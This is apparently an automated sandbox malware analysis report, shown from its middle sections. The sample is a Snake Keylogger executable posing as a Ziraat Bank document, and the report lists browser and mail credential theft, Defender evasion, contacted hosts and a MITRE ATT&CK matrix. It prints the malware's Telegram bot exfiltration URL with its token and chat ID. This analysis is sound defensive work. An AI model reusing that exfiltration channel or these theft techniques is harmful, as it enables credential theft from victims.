          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4154364843.0000000003215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4154364843.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 6640, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTR
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4154364843.0000000003215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4154364843.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 6640, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTR
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          DLL Side-Loading          		11
          Process Injection          		11
          Masquerading          		1
          OS Credential Dumping          		1
          Query Registry          		Remote Services1
          Email Collection          		1
          Web Service          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading          		11
          Disable or Modify Tools          		LSASS Memory1
          Security Software Discovery          		Remote Desktop Protocol11
          Archive Collected Data          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager1
          Process Discovery          		SMB/Windows Admin Shares1
          Data from Local System          		1
          Ingress Tool Transfer          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Process Injection          		NTDS31
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
          Obfuscated Files or Information          		Cached Domain Credentials1
          System Network Configuration Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Software Packing          		DCSync1
          File and Directory Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Timestomp          		Proc Filesystem13
          System Information Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          DLL Side-Loading          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519312 Sample: ziraat bankasi_TRY M#U00fc#... Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 22 reallyfreegeoip.org 2->22 24 api.telegram.org 2->24 26 2 other IPs or domains 2->26 34 Suricata IDS alerts for network traffic 2->34 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 44 10 other signatures 2->44 8 ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe 4 2->8         started        signatures3 40 Tries to detect the country of the analysis system (by using the IP) 22->40 42 Uses the Telegram API (likely for C&C communication) 24->42 process4 file5 20 ziraat bankasi_TRY... 26.09.2024.exe.log, ASCII 8->20 dropped 46 Adds a directory exclusion to Windows Defender 8->46 12 ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        signatures6 process7 dnsIp8 28 api.telegram.org 149.154.167.220, 443, 49756, 49757 TELEGRAMRU United Kingdom 12->28 30 reallyfreegeoip.org 188.114.96.3, 443, 49735, 49737 CLOUDFLARENETUS European Union 12->30 32 checkip.dyndns.com 193.122.6.168, 49733, 49738, 49740 ORACLE-BMC-31898US United States 12->32 48 Moves itself to temp directory 12->48 50 Tries to steal Mail credentials (via file / registry access) 12->50 52 Tries to harvest and steal browser information (history, passwords, etc) 12->52 54 Loading BitLocker PowerShell Module 16->54 18 conhost.exe 16->18         started        signatures9 process10

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe32%ReversingLabsByteCode-MSIL.Trojan.Generic
          ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.fontbureau.com0%URL Reputationsafe
          http://www.fontbureau.com/designersG0%URL Reputationsafe
          http://www.fontbureau.com/designers/?0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.fontbureau.com/designers?0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.fontbureau.com/designers0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
          http://checkip.dyndns.org/0%URL Reputationsafe
          http://checkip.dyndns.org/q0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.fontbureau.com/designers80%URL Reputationsafe
          http://www.fonts.com0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          https://reallyfreegeoip.org/xml/0%URL Reputationsafe
          https://api.telegram.org/bot0%Avira URL Cloudsafe
          http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
          https://api.telegram.org0%Avira URL Cloudsafe
          https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4200%Avira URL Cloudsafe
          https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
          http://api.telegram.org0%Avira URL Cloudsafe
          https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          reallyfreegeoip.org
          		188.114.96.3
          		truetrue
            		unknown
            api.telegram.org
            		149.154.167.220
            		truetrue
              		unknown
              checkip.dyndns.com
              		193.122.6.168
              		truefalse
                		unknown
                checkip.dyndns.org
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://reallyfreegeoip.org/xml/8.46.123.33false
                  • Avira URL Cloud: safe
                  		unknown
                  http://checkip.dyndns.org/false
                  • URL Reputation: safe
                  		unknown
                  https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snaketrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontbureau.comziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designersGziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/?ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.founder.com.cn/cn/bTheziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://api.telegram.orgziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.telegram.org/botziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontbureau.com/designers?ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.tiro.comziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designersziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.goodfont.co.krziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.carterandcone.comlziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.sajatypeworks.comziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.typography.netDziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/cabarga.htmlNziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.founder.com.cn/cn/cTheziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.galapagosdesign.com/staff/dennis.htmziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1747910042.00000000059C9000.00000004.00000020.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.founder.com.cn/cnziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/frere-user.htmlziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-420ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://checkip.dyndns.org/qziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.jiyu-kobo.co.jp/ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.galapagosdesign.com/DPleaseziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers8ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fonts.comziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.sandoll.co.krziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.urwpp.deDPleaseziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.zhongyicts.com.cnziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://api.telegram.orgziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1741070002.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003161000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.sakkal.comziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://reallyfreegeoip.org/xml/ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003161000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  149.154.167.220
                  		api.telegram.orgUnited Kingdom
                  		62041TELEGRAMRUtrue
                  193.122.6.168
                  		checkip.dyndns.comUnited States
                  		31898ORACLE-BMC-31898USfalse
                  188.114.96.3
                  		reallyfreegeoip.orgEuropean Union
                  		13335CLOUDFLARENETUStrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1519312
                  Start date and time:2024-09-26 10:58:07 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 7s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:10
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                  renamed because original name is a hash value
                  Original Sample Name:ziraat bankasi_TRY Mteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@6/6@4/3
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 30
                  • Number of non-executed functions: 17
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • VT rate limit hit for: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  04:59:02API Interceptor10747867x Sleep call for process: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe modified
                  04:59:04API Interceptor9x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  149.154.167.220SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
